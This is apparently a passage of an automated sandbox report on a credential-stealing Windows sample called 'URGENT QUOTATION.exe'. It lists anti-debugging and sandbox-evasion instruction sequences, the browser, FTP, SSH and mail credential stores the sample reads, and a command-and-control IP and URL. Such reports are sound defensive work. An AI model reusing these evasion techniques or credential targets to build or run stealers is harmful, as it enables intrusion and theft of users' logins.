Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021832DB push ebx; iretd 0_2_021832DE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802D7 push ebx; iretd 0_2_021802DA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021842C9 push ebx; iretd 0_2_021842CA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802CD push ebx; iretd 0_2_021802CE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852CD push ebx; iretd 0_2_021852CE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802C3 push ebx; iretd 0_2_021802C6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852F9 push ebx; iretd 0_2_021852FA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802F3 push ebx; iretd 0_2_021802F6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: URGENT QUOTATION.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218524C second address: 000000000218524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000056524C second address: 000000000056524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000564C8B second address: 0000000000564C8B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor word ptr [eax+ebx], cx 0x0000000f cmp ebx, 0000033Dh 0x00000015 jnl 00007F270CB2D94Bh 0x00000017 add ebx, 02h 0x0000001a jmp 00007F270CB2D8FCh 0x0000001c jmp 00007F270CB2D946h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021853EC rdtsc 0_2_021853EC
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6884 Thread sleep count: 91 > 30 Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6660 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Last function: Thread delayed
Source: URGENT QUOTATION.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218613D NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,? 0_2_0218613D
Hides threads from debuggers
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021853EC rdtsc 0_2_021853EC
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021830FC LdrInitializeThunk, 0_2_021830FC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182BF7 mov eax, dword ptr fs:[00000030h] 0_2_02182BF7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218182B mov eax, dword ptr fs:[00000030h] 0_2_0218182B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021846D2 mov eax, dword ptr fs:[00000030h] 0_2_021846D2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021846D7 mov eax, dword ptr fs:[00000030h] 0_2_021846D7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181F7A mov eax, dword ptr fs:[00000030h] 0_2_02181F7A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181F7D mov eax, dword ptr fs:[00000030h] 0_2_02181F7D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218578B mov eax, dword ptr fs:[00000030h] 0_2_0218578B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218578F mov eax, dword ptr fs:[00000030h] 0_2_0218578F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857AE mov eax, dword ptr fs:[00000030h] 0_2_021857AE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181FAF mov eax, dword ptr fs:[00000030h] 0_2_02181FAF
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857C9 mov eax, dword ptr fs:[00000030h] 0_2_021857C9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857E7 mov eax, dword ptr fs:[00000030h] 0_2_021857E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181D7E mov eax, dword ptr fs:[00000030h] 0_2_02181D7E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184DA0 mov eax, dword ptr fs:[00000030h] 0_2_02184DA0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184DA3 mov eax, dword ptr fs:[00000030h] 0_2_02184DA3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00564DA3 mov eax, dword ptr fs:[00000030h] 4_2_00564DA3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00564DA0 mov eax, dword ptr fs:[00000030h] 4_2_00564DA0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005646D7 mov eax, dword ptr fs:[00000030h] 4_2_005646D7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005646D2 mov eax, dword ptr fs:[00000030h] 4_2_005646D2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657C9 mov eax, dword ptr fs:[00000030h] 4_2_005657C9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562BF3 mov eax, dword ptr fs:[00000030h] 4_2_00562BF3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657E7 mov eax, dword ptr fs:[00000030h] 4_2_005657E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562BE1 mov eax, dword ptr fs:[00000030h] 4_2_00562BE1
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056578F mov eax, dword ptr fs:[00000030h] 4_2_0056578F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056578B mov eax, dword ptr fs:[00000030h] 4_2_0056578B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657AE mov eax, dword ptr fs:[00000030h] 4_2_005657AE
Enables debug privileges
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_0056216A

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe' Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180701 cpuid 0_2_02180701
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 356236 Sample: URGENT QUOTATION.exe Startdate: 22/02/2021 Architecture: WINDOWS Score: 100 19 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->19 21 Multi AV Scanner detection for domain / URL 2->21 23 Multi AV Scanner detection for submitted file 2->23 25 8 other signatures 2->25 6 URGENT QUOTATION.exe 1 2->6         started        process3 signatures4 27 Tries to detect Any.run 6->27 29 Hides threads from debuggers 6->29 9 URGENT QUOTATION.exe 60 6->9         started        process5 dnsIp6 13 51.195.53.221, 49743, 49744, 49745 OVHFR France 9->13 15 onedrive.live.com 9->15 17 2 other IPs or domains 9->17 31 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 9->31 33 Tries to steal Mail credentials (via file access) 9->33 35 Tries to harvest and steal ftp login credentials 9->35 37 3 other signatures 9->37 signatures7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
51.195.53.221
 unknown France
16276 OVHFR true

Contacted Domains

Name IP Active
onedrive.live.com unknown unknown
gnpnew.by.files.1drv.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://51.195.53.221/p.php/594QbwaP456AN true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown